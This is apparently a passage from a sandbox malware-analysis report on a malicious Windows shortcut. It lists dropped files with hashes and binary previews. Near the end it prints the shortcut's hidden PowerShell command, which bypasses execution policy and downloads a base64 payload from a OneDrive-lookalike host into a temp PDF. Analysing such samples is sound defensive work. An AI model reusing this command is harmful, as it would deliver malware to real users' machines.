                                                                                Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-30-17-077.log

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with very long lines (393)
                                                                                Category:dropped
                                                                                Size (bytes):16525
                                                                                Entropy (8bit):5.345946398610936
                                                                                Encrypted:false
                                                                                SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                Malicious:false
                                                                                Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):15114
                                                                                Entropy (8bit):5.304823188441062
                                                                                Encrypted:false
                                                                                SSDEEP:384:o+wXvZKF3iPmgBH3aB8OHZSjvIxJJK6IH06LFVuAYomqC/RyQp0+QdQhkCcYcWYs:1nT
                                                                                MD5:2EB7F23FC73CD50686E7155606C9014C
                                                                                SHA1:6E547B6588C77E25EFA132CBF0AFBBAB038D6B8D
                                                                                SHA-256:BF4E3D9C2A377C81C855EFD57A22A1B4B16BA5AED0D365BBDDF70A5E07487819
                                                                                SHA-512:11E2E2CA1E1A019EB6B364814D53F537C4070A58AF1E637DD27BC2DC83CD6331D48C69E764CE61CFB3D1F8C8E1F5FF8010DE161435DE15A31CE1A87AC9E663ED
                                                                                Malicious:false
                                                                                Preview:SessionID=d0a4f49f-3425-447a-848d-2a2e39ae220f.1727703017094 Timestamp=2024-09-30T09:30:17:094-0400 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d0a4f49f-3425-447a-848d-2a2e39ae220f.1727703017094 Timestamp=2024-09-30T09:30:17:095-0400 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d0a4f49f-3425-447a-848d-2a2e39ae220f.1727703017094 Timestamp=2024-09-30T09:30:17:095-0400 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d0a4f49f-3425-447a-848d-2a2e39ae220f.1727703017094 Timestamp=2024-09-30T09:30:17:095-0400 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d0a4f49f-3425-447a-848d-2a2e39ae220f.1727703017094 Timestamp=2024-09-30T09:30:17:096-0400 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):29752
                                                                                Entropy (8bit):5.392800810578603
                                                                                Encrypted:false
                                                                                SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rT:X
                                                                                MD5:FEC9B935837616B3A3ACE3BDCACF6C14
                                                                                SHA1:F9109011DEEDB22D738061DB311AE4D9304FE5BD
                                                                                SHA-256:3AEF7248E8AC6F724F64735AF7D12037E81CDCA50AE6CCA036066F7164D95B07
                                                                                SHA-512:C9821814BBB1513A0C7D28F8388A699F0D3640541C16C13DA01F0AEBD434EB7E017B38756371A13A2F155AADE74AE00AC7AA85EE654B75198A81AEB3C1A1872B
                                                                                Malicious:false
                                                                                Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\2c4e8e2b-e55a-4ae2-8888-bc7e68d2c4f5.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                Category:dropped
                                                                                Size (bytes):1407294
                                                                                Entropy (8bit):7.97605879016224
                                                                                Encrypted:false
                                                                                SSDEEP:24576:/ylwYIGNPpbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:wwZGzb3mlind9i4ufFXpAXkrfUs0qWLa
                                                                                MD5:1AC1AB3A56B96E12EC8E982411F8EBF9
                                                                                SHA1:D33D10C8D015AB418872A46CDAF9236BED70A293
                                                                                SHA-256:CBD53FC2E7BE4EF29388D387E1D0A296AE2DDBA6D3B32B430285E91E29211892
                                                                                SHA-512:44FA02BC9E12FE2E3FD83F874227377ECA9A93BB0B91198038E0702B98E861DDDAE5D6EAB53D1CAFF9DD7F46F3D39768D7CF0A70C77D1C692C97F912EFAD4A3C
                                                                                Malicious:false
                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\455b4b45-ce7e-4de2-8d5c-da36573e1eab.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                Category:dropped
                                                                                Size (bytes):1419751
                                                                                Entropy (8bit):7.976496077007677
                                                                                Encrypted:false
                                                                                SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                                                                                MD5:41034A6B023B6BB9C723DA146E190954
                                                                                SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                                                                                SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                                                                                SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                                                                                Malicious:false
                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\68320fab-9ad9-42a1-81d0-3764c3dc701b.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                Category:dropped
                                                                                Size (bytes):386528
                                                                                Entropy (8bit):7.9736851559892425
                                                                                Encrypted:false
                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                Malicious:false
                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                C:\Users\user\AppData\Local\Temp\acrocef_low\a6aeac7b-2aef-42e0-b739-4d8bff13c2ee.tmp

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                Category:dropped
                                                                                Size (bytes):758601
                                                                                Entropy (8bit):7.98639316555857
                                                                                Encrypted:false
                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                Malicious:false
                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):98682
                                                                                Entropy (8bit):6.445287254681573
                                                                                Encrypted:false
                                                                                SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                                MD5:7113425405A05E110DC458BBF93F608A
                                                                                SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                                SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                                SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                                Malicious:false
                                                                                Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                                C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                Download File
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):737
                                                                                Entropy (8bit):7.501268097735403
                                                                                Encrypted:false
                                                                                SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                                MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                                SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                                SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                                SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                                Malicious:false
                                                                                Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4B6B3472GS6U6Y1RPJT.temp

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):5376
                                                                                Entropy (8bit):3.460341123278434
                                                                                Encrypted:false
                                                                                SSDEEP:48:31MZ6Lx8dE8rfMR4glRkSogZoo/MR4gl4kSogZoM1:35mVzk4gVHhk4guH3
                                                                                MD5:588D31343319DD8C6C5DB07A67633DA7
                                                                                SHA1:524DA36D6B1FC247E184D8EC2BBFC77DF032DAF6
                                                                                SHA-256:A9951DFDDC47A821E40E9AEA79892ABBCBD430EB6DEC5FB33295E7D77E0E8A28
                                                                                SHA-512:A9EAA4248B1A6F234550955FBC416FA18281B63B41FB46587CDED8F3A0A0BDECBB8B762146605F89C55B9776D338AABBC4952903BAF8CFF0D61E4FEFD9009737
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.`.. .....%.....|...<....jl.<................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....}R......|...<.....j.2.....>Y.k .XKCI1B~1.LNK..N......DWS`>Y.k..........................6E..X.k.c.i.1.B.f.r.m.X...l.n.k.......T...............-.......S.............}......C:\Users\user\Desktop\Xkci1BfrmX.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e...................................................................................................................................................

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bfc766e4fe485b53.customDestinations-ms (copy)

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):5376
                                                                                Entropy (8bit):3.460341123278434
                                                                                Encrypted:false
                                                                                SSDEEP:48:31MZ6Lx8dE8rfMR4glRkSogZoo/MR4gl4kSogZoM1:35mVzk4gVHhk4guH3
                                                                                MD5:588D31343319DD8C6C5DB07A67633DA7
                                                                                SHA1:524DA36D6B1FC247E184D8EC2BBFC77DF032DAF6
                                                                                SHA-256:A9951DFDDC47A821E40E9AEA79892ABBCBD430EB6DEC5FB33295E7D77E0E8A28
                                                                                SHA-512:A9EAA4248B1A6F234550955FBC416FA18281B63B41FB46587CDED8F3A0A0BDECBB8B762146605F89C55B9776D338AABBC4952903BAF8CFF0D61E4FEFD9009737
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.`.. .....%.....|...<....jl.<................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v....}R......|...<.....j.2.....>Y.k .XKCI1B~1.LNK..N......DWS`>Y.k..........................6E..X.k.c.i.1.B.f.r.m.X...l.n.k.......T...............-.......S.............}......C:\Users\user\Desktop\Xkci1BfrmX.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e...................................................................................................................................................

                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                Static File Info

                                                                                General

                                                                                File type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Tue Sep 24 10:15:50 2024, mtime=Tue Sep 24 10:15:50 2024, atime=Tue Sep 24 10:15:50 2024, length=0, window=hide
                                                                                Entropy (8bit):6.024961800175695
                                                                                TrID:
                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                File name:Xkci1BfrmX.lnk
                                                                                File size:2'184 bytes
                                                                                MD5:183474e2bc35660701e24edecea07c71
                                                                                SHA1:2d59c3f6b34ccc25d8706e40c1b2001a445df01b
                                                                                SHA256:757fcc23a03ad93e5414ae62b910ec171286123a903472bc9bfe102ec9d30d78
                                                                                SHA512:108956ae02ceff474a8c0749ea4471298c66699047d323d36df078522744067e1e258d9954cf5d351ed036191508125351aa1d45a997e7aba6cfac31de55ccda
                                                                                SSDEEP:48:8ujRq3I+t/dWzm73KGpTaK+hlp40mB38Q1v6B0WAKB0Q:8e0hA03hpWVleVBMWvu0WH0Q
                                                                                TLSH:E041A7206390974CDD6158B34A3EE07226B23E791D523EA582E49ACCCDA293EF176335
                                                                                File Content Preview:L..................Fe...........s.......s.......s................................P.O. .:i.....+00.../C:\.....................2..:..HG.%..windows\system32\WindowsPowershell\v1.0\powershell.exe..........HG.%.KMA....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.

                                                                                File Icon

                                                                                Icon Hash:5b55554d49c3c94d

                                                                                Static Windows Shortcut Info

                                                                                General

                                                                                Relative Path:
                                                                                Command Line Argument:-w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', 